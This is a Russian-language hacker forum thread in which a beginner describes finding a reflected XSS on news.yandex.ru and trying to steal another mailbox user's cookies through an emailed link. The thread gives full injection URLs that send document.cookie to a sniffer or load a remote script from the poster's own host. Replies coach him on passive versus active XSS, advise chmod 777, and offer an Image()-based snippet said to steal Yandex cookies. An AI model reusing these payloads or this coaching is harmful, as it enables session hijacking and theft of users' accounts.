Привет всем! (ПОИСКОВИКОМ ПОЛЬЗОВАЛСЯ И ПРОЧИТАЛ ВСЕ СТАТЬИ О XSS на сайте) _____--____ Начнем _____--____ Нашел я xss на сайте news.yandex.ru (уязвимость точно есть, так как при подставки кода "<script>alert(document.domain)</script>" выкидывает название сайта) Зарегистрировал я себе 2 мыла на яндексе (1@yandex.ru and 2@yandex.ru) и пытаюсь спереть куки от одно. Тренинг короче))) ____--_____ Практика ____--_____ Отсылаю с 1@yandex.ru на 2@yandex.ru письмо с сылкой http://[адрес сайта]<script src="/cgi-bin/s.jpg?"+document.cookie;></script> ____--_____ Вопросы ____--_____ 1) Почему на снифер не приходят куки? 2) Прочитал на форуме античата что в активных Xss участие жертвы не нужно. Разьясните этот момент ведь мы все равно будем кидать ссылку жертве на мыло?? 3) В некоторых статьях советают создать скрипты php a) нужно прописывать права для скриптов на своем сайте? Зачем создавать скрипты когда можно через сниффер угнать куки. Или я не прав? _____--_____ Последние слова (Заключение) _____--_____ Поиском пользовался, видио смотрел!!! Спасибо огромное всем кто ответит на вопросы!!
1) сложно сказать, хорошобы еслиб ты привёл пример 2) письмо жертве посылается в html формате , где внедрён тег , который использует javascript - это и есть xss, пример : <img src="javascript:alert()"> - вот , жертве не нужно ничего нажимать, скрипт сработает в любом случае 3) сессия, которая приходит на снифер "живёт" не долго, поэтому лучше, чтоб этот скрипт выполнял автоматически то, что ты хочешь сделать в почте права ставь 777 ( rwxrwxrwx ) – не ошибешься ( а лучше почитай про права никсах)
Дополню Майора Выкидывать алерт оно может, однако слеши, плюс, кавычки, проценты, точка с запятой и т.п. может и резаться. + когда высылаешь ссылку по почте - также и твой <script> будет вырезаться.
Полный ход действий! Вот Xss http://news.yandex.ru/yandsearch?cl4url=lenta.ru/news/2006/08/24/nine/&country=Russia"><script>alert(document.domain)</script> Вот ято я посылаю на почту http://news.yandex.ru/yandsearch?cl4url=www.rian.ru/society/20060824/53095993.html&country=Russia"><script%20src="/cgi-bin/s.jpg?"+document.cookie;></script> Вопрос: Почему не приходят куки? _____--_____ Другой способ по статье http://forum.web-hack.ru/index.php?showtopic=28026&st=0 _____--_____ Таже самая Xss Скрипты залиты на хостинг права прописаны! Отсылаю жертве http://news.yandex.ru/yandsearch?cl4url=primamedia.ru/news/show/%3Fid%3D19366&country=Russia="><script%20src=http://[мой_сайт]/script/xss.js>%20</script> Куков тоже нет? ((((((( Примечание: Я отсылаю <script src=http://[мой_сайт]/script/xss.js></script> жертве а потом он преобразуется в <script%20src=http://[мой_сайт]/script/xss.js>%20</script> Это играет какую нибудь роль? Ответьте пожалуйста на 3 вопроса: 1) Почему нет куков в 1 случае 2) Почему нет куков во 2 случае 3) Это играет какую нибудь роль? Заранее спасибо спасибо спасибо))))) _____--_____
Ты лучше сам попробуй разобраться. Я долго с ними возился и доставал в пм майора, и все равно у меня то получалось, то нет. Потом разобрался вот и все и нет проблем
Во первых, твоя хсс пассивная, а это означает, что ничего не заработает, пока жертва не нажмёт на твою ссылку(а это должен быть полный ламер(ша), чтоб жать на левые линки). Во вторых твоя пассивная хсс находится на другом поддомене, а куки на разных поддоменах отличаются. Те куки на mail.yandex.ru свои, а на news.yandex.ru свои. Так что даже если он(а) и нажмёт - толка не будет. В третьих - нафига тебе домен? <script>alert(document.domain)</script> Куки уганяются document.cookie, или когда данные передаются через гет-запрос - document.location В четвёртых человек может проверять почту используя программы типа зебата, аутлука, мозилы и прочих. И тут хоть тресни.
Бля я вообще запутался (((((( bul.666 Напиши как проверить!!! При подставки document.cookie вылазиет большая таблица где дохрена цифр! Что это значит? При подставки document.location выскакивает url который написан в строке браузера. Что нам это дает?
Активный xss отличается от пассивного тем, что ты его не видишь. Это просто код внедрённый в страницу, он выполняется при открытии страницы. В твоём случае, ты используешь пассивный xss. Чел кликнуть туда должен. Если я найду xss на www.bla.com, и пошлю тебе ссылку на твою почту на мэйл.ру Если ты её кликнешь куков не будет. Потому что mail.ru и bla.com два разных хоста. Так же 1.mail.ru, 2.mail.ru fuck.mail.ru могут быть разными хостами.
Попробуй использовать другой код. Не факт что твой код вообще должен работать. Вот код который работает 100% на ксс в яндексе. Code: <script>img = new Image(); img.src = "your sniffer"+document.cookie;</script>